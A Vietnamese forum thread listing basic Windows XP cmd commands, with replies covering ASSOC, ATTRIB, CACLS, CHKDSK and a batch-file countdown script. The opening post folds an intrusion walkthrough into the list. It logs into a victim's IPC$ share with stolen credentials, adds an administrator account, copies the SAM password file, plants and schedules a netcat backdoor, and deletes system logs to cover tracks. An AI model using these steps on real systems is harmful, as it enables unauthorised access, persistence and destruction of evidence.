No announcement yet.

Các lệnh cơ bản trong cmd !!!

 • Lọc
 • Giờ
 • Show
Clear All
new posts

 • Các lệnh cơ bản trong cmd !!!

  Trong Windows XP có nhiều lệnh , nhưng thông thường chúng ta hay dùng các lệnh sau ( để chạy những lệnh này bấm Start --> chọn Run --> bấm CMD --> bấm OK ).

  1. Lệnh Ping : Cú pháp: Code: ping ip/host [/t][/a][/l][/n] - ip: địa chỉ IP của máy cần kiểm tra; host là tên của máy tính cần kiểm tra. Người ta có thể sử dụng địa chỉ IP hoặc tên của máy tính. - Tham số /t: Sử dụng tham số này để máy tính liên tục "ping" đến máy tính đích, cho đến khi bạn bấm Ctrl + C - Tham số /a: Nhận địa chỉ IP từ tên host - Tham số /l : Xác định độ rộng của gói tin gửi đi kiểm tra. Một số hacker sử dụng tham số này để tấn công từ chối dịch vụ một máy tính (Ping of Death - một loại DoS), nhưng tôi nghĩ là hacker có công cụ riêng để ping một gói tin lớn như thế này, và phải có nhiều máy tính cùng ping một lượt. - Tham số /n : Xác định số gói tin sẽ gửi đi. Ví dụ: ping 174.178.0.1/n 5 Công dụng : + Lệnh này được sử dụng để kiểm tra xem một máy tính có kết nối với mạng không. Lệnh Ping sẽ gửi các gói tin từ máy tính bạn đang ngồi tới máy tính đích. Thông qua giá trị mà máy tính đích trả về đối với từng gói tin, bạn có thể xác định được tình trạng của đường truyền (chẳng hạn: gửi 4 gói tin nhưng chỉ nhận được 1 gói tin, chứng tỏ đường truyền rất chậm (xấu)). Hoặc cũng có thể xác định máy tính đó có kết nối hay không (Nếu không kết nối,kết quả là Unknow host)....

  2. Lệnh Tracert : Cú pháp : Code: tracert ip/host Công dụng : + Lệnh này sẽ cho phép bạn "nhìn thấy" đường đi của các gói tin từ máy tính của bạn đến máy tính đích, xem gói tin của bạn vòng qua các server nào, các router nào... Quá hay nếu bạn muốn thăm dò một server nào đó.

  3. Lệnh Net Send, gởi thông điệp trên mạng (chỉ sử dụng trên hệ thống máy tình Win NT/2000/XP): Cú pháp: Net send ip/host thông_điệp_muốn_gởi Công dụng: + Lệnh này sẽ gửi thông điệp tới máy tính đích (có địa chỉ IP hoặc tên host) thông điệp: thông_điệp_muốn_gởi. + Trong mạng LAN, ta có thể sử dụng lệnh này để chat với nhau. Trong phòng vi tính của trường tui thường dùng lệnh này để ghẹo mọi người! Bạn cũng có thể gởi cho tất cả các máy tính trong mạng LAN theo cấu trúc sau : Code: Net send * hello!I'm pro_hacker_invn

  4. Lệnh Netstat : Cú pháp: Code: Netstat [/a][/e][/n] - Tham số /a: Hiển thị tất cả các kết nối và các cổng đang lắng nghe (listening) - Tham số /e: hiển thị các thông tin thống kê Ethernet - Tham số /n: Hiển thị các địa chỉ và các số cổng kết nối... Ngoải ra còn một vài tham số khác, hãy gõ Netstat/? để biết thêm Công dụng : + Lệnh Netstat cho phép ta liệt kê tất cả các kết nối ra và vào máy tính của chúng ta.

  5. Lệnh IPCONFIG : Cú pháp: Code: ipconfig /all Công dụng: + Lệnh này sẽ cho phép hiển thị cấu hình IP của máy tính bạn đang sử dụng, như tên host, địa chỉ IP, mặt nạ mạng...

  6. Lệnh FTP (truyền tải file): Cú pháp: Code: ftp ip/host Nếu kết nối thành công đến máy chủ, bạn sẽ vào màn hình ftp, có dấu nhắc như sau: Code: ftp>_ Tại đây, bạn sẽ thực hiện các thao tác bằng tay với ftp, thay vì dùng các chương trình kiểu Cute FTP, Flash FXP. Nếu kết nối thành công, chương trình sẽ yêu cầu bạn nhập User name, Password. Nếu username và pass hợp lệ, bạn sẽ được phép upload, duyệt file... trên máy chủ. Một số lệnh ftp cơ bản: -cd thu_muc: chuyển sang thư mục khác trên máy chủ - dir: Xem danh sách các file và thư mục của thư mục hiện thời trên máy chủ - mdir thu_muc: Tạo một thư mục mới có tên thu_muc trên máy chủ - rmdir thu_muc: Xoá (remove directory) một thư mục trên máy chủ - put file: tải một file file (đầy đủ cả đường dẫn. VD: c:\tp\bin\baitap.exe) từ máy bạn đang sử dụng lên máy chủ. - close: Đóng phiên làm việc - quit: Thoát khỏi chương trình ftp, quay trở về chế độ DOS command. Ngoài ra còn một vài lệnh nữa, xin mời các bạn tự tìm hiểu. Công dụng : + FTP là một giao thức được sử dụng để gửi và nhận file giữa các máy tính với nhau. Windows đã cài đặt sẵn lệnh ftp, có tác dụng như một chương trình chạy trên nền console (văn bản), cho phép thực hiện kết nối đến máy chủ ftp

  7. Lệnh Net View : Cú pháp: Code: Net View [\\computer|/Domain[:ten_domain]] Công dụng: + Nếu chỉ đánh net view [enter], nó sẽ hiện ra danh sách các máy tính trong mạng cùng domain quản lý với máy tính bạn đang sử dụng. + Nếu đánh net view \\tenmaytinh, sẽ hiển thị các chia sẻ tài nguyên của máy tính tenmaytinh . Sau khi sử dụng lệnh này, các bạn có thể sử dụng lệnh net use để sử dụng các nguồn tài nguyên chia sẻ này.

  8. Lệnh Net Use : Cú pháp: Code: Net use \\ip\ipc$ "pass" /user:"xxx" - ip: địa chỉ IP của victim. - xxx: user của máy victim - pass: password của user Giả sử ta có đc user và pass của victim có IP là 68.135.23.25 trên net thì ta đã có thể kết nối đến máy tính đó rùi đấy! Ví dụ: user: vitim ; pass :12345 . Ta dùng lệnh sau: Code: Net use \\68.135.23.25\ipc$ "12345" /user:"victim" Công dụng: + kết nói một IPC$ đến máy tính victim (bắt đầu quá trình xâm nhập).

  9. Lệnh Net User : Cú pháp: Code: Net User [username pass] [/add] - Username : tên user cấn add - pass : password của user cần add Khi đã add đc user vào rùi thì ta tiến hành add user này vào nhóm administrator. Code: Net Localgroup Adminstrator [username] [/add] Công dụng: + Nếu ta chỉ đánh lệnh Net User thì sẽ hiển thị các user có trong máy tính. + Nếu ta đánh lệnh Net User [username pass] [/add] thì máy tính sẽ tiến hành thêm một người dùng vào. Ví dụ: ta tiến hành add thêm một user có tên là xuanhoa , password là :banvatoi vào với cấu trúc lệnh như sau: Code: Net User xuanhoa banvatoi /add Sau đó add user xuanhoa vào nhóm adminnistrator Code: Net Localgroup Administrator xuanhoa /add

  10. Lệnh Shutdown
  : Cú pháp: Code: Shutdown [-m \\ip] [-t xx] [-i] [-l] [-s] [-r] [-a] [-f] [-c "commet] [-d upx:yy] (áp dụng cho win XP) - Tham số -m\\ip : ra lệnh cho một máy tính từ xa thực hiên các lệnh shutdown, restart,.. - Tham số -t xx : đặt thời gian cho việc thực hiện lệnh shutdown. - Tham số -l : logg off (lưu ý ko thể thực hiện khi remote) - Tham số -s : shutdown - Tham số -r : shutdown và restart - Tham số -a : không cho shutdown - Tham số -f : shutdown mà ko cảnh báo - Tham số -c "comment" : lời cảnh báo trước khi shutdown - Tham số -d upx:yy : ko rõ Code: shutdown \\ip (áp dụng win NT) Để rõ hơn về lệnh shutdown bạn có thể gõ shutdown /? để được hướng dẫn cụ thể hơn! Công dụng: + Shutdown máy tính.

  11. Lệnh DIR : Cú pháp: Code: DIR [drive:][path][filename] Lệnh này quá căn bản rùi, chắc tui khỏi hướng dẫn, để rõ hơn bạn đánh lệnh DIR /? để được hướng dẫn. Công dụng: + Để xem file, folder.

  12. Lệnh DEL : Cú pháp: Code: DEL [drive:][path][filename] Lệnh này cũng căn bản rùi, ko phải nói nhìu. Công dụng: Xóa một file, thông thường sau khi xâm nhập vào hệ thống, ta phái tiến hành xóa dấu vết của mình để khỏi bị phát hiện.Sau đây là những files nhật ký của Win NT: Code: del C:\winnt\system32\logfiles\*.* del C:\winnt\ssytem32\config\*.evt del C:\winnt\system32\dtclog\*.* del C:\winnt\system32\*.log del C:\winnt\system32\*.txt del C:\winnt\*.txt del C:\winnt\*.log

  13. Lệnh tạo ổ đĩa ảo trên computer: Cú pháp: Code: Net use z: \\ip\C$ ( hoặc là IPC$ ) - Z là của mình...còn C$ là của Victim Công dụng: Tạo 1 đĩa ảo trên máy tính (lệnh này tui ko rõ nên ko thể hướng dẫn chi tiết đc)

  14. Lệnh Net Time
  : Cú pháp: Code: Net Time \\ip Công dụng: + Cho ta biết thời gian của victim, sau đó dùng lệnh AT để khởi động chương trình.

  15. Lệnh AT: Cú pháp: Code: AT \\ip Công dụng: + Thông thường khi xâm nhập vào máy tính victim khi rút lui thì ta sẽ tặng quà lưu niệm lên máy tính victim, khi đã copy troj hoặc backdoor lên máy tính rùi ta sẽ dùng lệnh at để khởi động chúng. Ví dụ: ở đây tui có con troj tên nc.exe (NC là từ viết tắc của NETCAT....nó là một telnet server với port 99) và đc copy lên máy victim rùi. Đầu tiên ta cần biết thời gian của victim có IP là : 68.135.23.25 . Code: Net Time \\68.135.23.25 Bây h nó sẽ phản hồi cho ta thời gian của victim, ví dụ : 12:00. Code: AT \\68.135.23.25 12:3 nc.exe Đợi đến 12:3 là nó sẽ tự chạy trên máy nạn nhân và chúng ta có thể connected đến port 99.

  16. Lệnh Telnet: Cú pháp: Code: telnet host port Gõ telnet /? để biết thêm chi tiết. Nhưng nếu như máy victim đã dính con nc rồi thì ta chỉ cần connect đến port 99 là OKie Code: telnet 68.135.23.25 99 Công dụng: + Kết nối đến host qua port xx

  17. Lệnh COPY: Cú pháp: Code: COPY /? Dùng lệnh trên để rõ hơn! Công dụng: + Copy file, tui khỏi nói thêm nhé. Ví dụ:chúng ta copy files index trên ổ C của mình lên ổ C của 127.0.0.1 Code: Copy Index.html \\127.0.0.1\C$\index.html nếu bạn copy lên folder winNt Code: Copy index.html \\127.0.0.1\admin$\index.html muốn copy files trên máy victm thì bạn gõ vào : Code: Copy \\127.0.0.1\Admin$\repair\sam._c:\

  18. Lệnh SET
  : Cú pháp: Code: SET Công dụng: + Displays, sets, or removes cmd.exe enviroment variables. 19. Lệnh Nbtstat: Cú pháp: Code: Nbtstat /? Gõ lệnh trên để rõ hơn về lệnh này. Công dụng: + Display protocol statistic and curent TCP/IP connections using NBT (netbios over TCP?IP) Trên đây là một số hiểu biết hạn hẹp của em về các lệnh CMD, em đã đọc được từ rất nhiều nguồn khác nhau, nay tổng hợp lại cho mọi người tham khảo. Có một số lệnh em vẫn chưa hiểu cấu trúc lệnh và chưa có điều kiện để thực hành thử nên ko hướng dẫn kỹ. Ai biết thì góp ý nhé! Mong các pro đừng cười! Nếu thấy bài viết của em hay thì làm ơn thank cho một cái nhé

  19 bootcfg
  : xem thiết lập phần tải hệ điều hành ban đầu .

  20 defrag : lệnh này dùng để dồn đĩa cứng .

  21 diskpart : quản lí phân vùng trên đĩa . Chúng ta có thể bấm DISKPART / ? để xem hướng dẫn cách dùng chi tiết .

  22 driverquery : nhận danh sách các chương trình Driver và những thuộc tính của chúng .

  23 getmac : nhận địa chỉ MAC ( Media Access Control ) của Card mạng .

  24 gpresult : nhận RSoP , những thiết lập người dùng và những thiết lập của chính sách nhóm.

  25 netsh :
  công cụ cấu hình mạng . Bấm NETSH / ? để biết thêm chi tiết . Để thoát khỏi công cụ này gõ lệnh NETSH>

  26 openfiles : cho phép Admin hiển thị hoặc bỏ kết nối những file đang mở trong XP Pro . Bấm OPENFILES/? để biết thêm về tham số .

  27 recover : khôi phục những thông tin không thể đọc được trên đĩa .

  28 reg : công cụ cho Registry .

  29 schtasks : Admin có thể tạo lịch trình , thay đổi , xoá những nhiệm vụ trên máy trạm hoặc những máy điều khiển từ xa . SCHTASKS/? để hiển thị những tham số .

  30 sfc : kiểm tra file hệ thống , bảo về và thay thế , sửa chữa những file hệ thống bị hỏng .

  31 shutdown : bạn có thể tắt hoặc khởi động lại máy tính của mình hoặc Admin có thể tắt hoặc khởi động lại những máy tính điều khiển từ xa .

  32 systeminfo
  : hiển thị những thông tin cấu hình cơ bản .

  33 tasklist : cho chúng ta biết những chương trình nào đang chạy .

  34 taskkill : tắt những chương trình đang chạy

  35 dxdiag : cấu hình

  Sưu tầm, ai còn bít thêm nữa thì góp chút ít nha !
  Hiệp sỹ Áo đen Bkav

 • #2
  Bạn nên có những ví dụ cụ thể cho mọi người dễ hiểu hơn.

  Comment


  • #3
   attrib:cấu hình thuộc tính cho file/folder
   HEDSPI-HUT
   http://isite.tk

   Comment


   • #4
    Mình có đầy. Mình biết chút về Ms-Dos
    Cái của bạn chưa gọi là cơ bản được, chỉ là cơ bản với mạng thôi.
    Mỗi ngày mình sẽ giới thiệu 1 lệnh

    ASSOC

    Code:
    Cú pháp  
    assoc [.ext[=[filetype]]] không nhập Nếu bạn không nhập đối số cho lệnh nó sẽ hiển thị tất cả mô tả cho tất cả các kiểu tập tin có trên máy bạn. Vì số lượng kiểu tập tin trên máy bạn rất lớn sẽ tràn qua nhiều trang màn hình. Vì thế bạn nên nhập assoc |more, khi đó bạn phải dùng phím Enter để chuyển qua xem từng kiểu tập tin.
     .ext Hiển thị mô tả cho kiểu tập tin nêu ra. Ví dụ nhập assoc .txt sẽ hiển thị .txt = textfile.
     .ext = Để xóa mô tả cho kiểu tập tin nêu ra.
     filetype Phần mô tả cho kiểu tập tin mà bạn muốn Windows 2000 nhận diện với kiểu tập tin đó.
    Lần sửa cuối bởi LoveRap; 22/08/10, 08:29 AM.

    Comment


    • #5
     ATTRIB

     Code:
     ATTRIB [+r|-r] [+a|-a] [+s|-s] [+h|-h] [[drive:][path] filename] [/s[/d]] +r Thiết lập thuộc tính chỉ đọc
     -r  Gỡ bỏ thuộc tính chỉ đọc.  +a  Thiết lập thuộc tính lưu trữ.
     -a  Gỡ bỏ thuộc tính lưu trữ. +s  Thiết lập thuộc tính hệ thống
     -s   Gỡ bỏ thuộc tính hệ thống +h  Thiết lập thuộc tính ẩn
     -h  Gỡ bỏ thuộc tính ẩn. [drive:][path] filename] đường dẫn của tập tin hoặc thư mục bạn muốn thiết lập hoặc gỡ bỏ. Bạn có thể dùng các ký tự đại diện ?, * để thiết lập cùng lúc cho nhóm tập tin, thư mục. 
     /s Áp dụng lệnh với các tập tin được tìm thấy trong thư mục hiện tại và tất cả các thư mục con của nó.  
     /d Áp dụng với các thư mục
      Lưu ý! 
     Khi lệnh không đi kèm các tham số sẽ cho bạn biết thuộc tính của tập tin, hoặc thư mục trong đường dẫn bạn đưa ra.


     CACLS


     Code:
     cacls filename [/t] [/e] [/c] [/g user:perm] [/r user [...]] [/p user:perm [...]] [/d user [...]]
     filename hiển thị bảng quản lý quyền truy cập của tập tin. /t thay đổi bảng quản lý tập tin chỉ định trong thư mục hiện tại và cho tất cả các thư mục con. /e chỉnh sửa thay vì thay thế bảng phân quyền truy cập. /c tiếp tục chỉnh sửa bảng phân quyền, bỏ qua các lỗi. /g user:perm cấp quyền truy cập cho người dùng. user là tên người dùng. perm là các quyền sau:
     n Không có quyền r Chỉ đọc c Thay đổi (ghi) f Toàn quyền
     /r user xóa quyền truy cập người dùng được chỉ định /p user:perm thay thế quyền truy cập của người dùng. user là tên người dùng. perm là các quyền sau:
     n Không có quyền r Chỉ đọc c Thay đổi (ghi) f Toàn quyền
     /d user cấm quyền truy cập cùa người dùng được chỉ định. Bạn có thể thực hiện lệnh với nhiều tập tin hoặc nhiều người dùng cùng lúc.
     Lưu ý! Để thực hiện lệnh này bạn phải dùng user có quyền thuộc nhóm Administrator.
     Lần sửa cuối bởi LoveRap; 23/08/10, 01:09 PM. Lý do: **** Bài Tự động ghép ****

     Comment


     • #6
      CHKDSK
      Công dụng
      Tạo hoặc hiển thị báo cáo về tình trạng ổ đĩa dựa trên hệ thống tập tin đã được dùng. CHKDSK có thể liệt kê và sửa lỗi ổ cứng. Nếu CHKDSK không thể sử dụng được nó sẽ đề nghị bạn thực hiện lại thử sau khi đã khởi động lại máy.
      Để dùng đựơc lệnh CHKDSK bạn phải thuộc nhóm quản trị (Administrator).


      Code:
      chkdsk [drive:][[path]  filename] [/f] [/v] [/r] [/l[:size]] [/x]
      Không có tham số: Hiển thị trạng thái của ổ đĩa hiện hành. drive: Chỉ định ổ đĩa để dùng lệnh CHKDSK đối với nó. [path] filename đường dẫn đến 1 hoặc tập hợp các tập tin thư mục mà bạn muốn kiểm tra độ phân mãnh của chúng. Dùng các ký tự thay thế (*, ?) để dại diện cho nhiều tập tin, thư mục cùng lúc. /f Sửa lỗi ổ đĩa nếu tìm thấy. Ổ đĩa phải được khóa, nếu không nó sẽ đề nghị bạn khởi động lại máy. /v Hiển thị tên của từng tập tin trong từng thư mục. /r Đánh dấu những cung lỗi trên đĩa và lấy lại những còn có khả năng sử dụng được

      Comment


      • #7
       Re: Các lệnh cơ bản trong cmd !!!

       Bai viet hay qua. Thanks bac nhieu

       Sorry Mod vi khong go duoc tieng Viet co dau

       Comment


       • #8
        Re: Các lệnh cơ bản trong cmd !!!

        thiếu một lệnh quan trọng trong hibernate win

        Hiệp sỹ Áo đen Bkav

        Comment


        • #9
         Re: Các lệnh cơ bản trong cmd !!!

         Ngoài mấy lệnh DIR, DEL, COPY là lệnh trong CMD còn lại thì toàn là app console.
         Uống chanh và nghe Chanh hát

         Comment


         • #10
          Re: Các lệnh cơ bản trong cmd !!!

          Lệnh net user administrator /active:no dùng để xóa 1 tài khoản phải không các anh ?

          Comment


          • #11
           Re: Các lệnh cơ bản trong cmd !!!

           trong ngôn ngữ LT khác thấy có lệnh tăng giá trị của một biến vd d=d+1 vậy trong CMD làm như thế nào mọi người

           Comment


           • #12
            Re: Các lệnh cơ bản trong cmd !!!

            Nguyên văn bởi bigzero Xem bài viết
            trong ngôn ngữ LT khác thấy có lệnh tăng giá trị của một biến vd d=d+1 vậy trong CMD làm như thế nào mọi người
            bác cho ví dụ cụ thể đi

            Comment


            • #13
             Re: Các lệnh cơ bản trong cmd !!!

             thì mình ping n con IP và muốn đếm số IP loss trên tổng số IP đã ping vậy là sẽ có 2 biến đếm

             Comment


             • #14
              Re: Các lệnh cơ bản trong cmd !!!

              Nguyên văn bởi scila1996 Xem bài viết
              bác cho ví dụ cụ thể đi
              bác scila1996 cho mình hỏi có code nào mà giúp delay thời gian thực ko cho mình biết với
              VD : khi bắt đầu file ***.bat hỏi "ban chon thòi gian delay là bao nhieu" sau đó ta nhập 1 số bất kỳ ( thời gian tính bằng phút )
              file ***.bat chạy và hiện lên dòng thời gian đếm lùi, sau khi hết thời gian đếm lùi thì bắt đầu chạy dòng code thực thi cần sử dụng
              giống như lệnh
              ping [IP] -n [time 's] >NUL
              nhưng lệnh này mỗi lần sử dụng phải edit trong file **.bat rất bất tiện @@!
              rất mong scila1996 giúp đỡ !

              Comment


              • #15
               Re: Các lệnh cơ bản trong cmd !!!

               ý bạn là thế này hả

               HTML Code:
               @color 1a
               @Echo off
               
               Title Test BF --------
               
               :a
               
               Echo.
               Echo.
               Echo Nhap thoi gian de bat dau chay notepad
               Echo.
               Echo.
               set /p nhap= Xin moi ban nhap thoi gian vao day.
               
               IF "%nhap%"=="" CLS&GOTO A
               
               :chay
               
               ping 127.0.0.1 -n %nhap% >nul 2>nul
               IF %ERRORLEVEL%== 1 Echo.&Echo Error ! Xin moi ban nhap lai !&pause >nul &cls&goto a
               start notepad
               exit
               ==> Copy vào ô TEXT rồi test xem.

               Comment

               Mời bạn bấm like để theo dõi Bkav forum trên Facebook
               X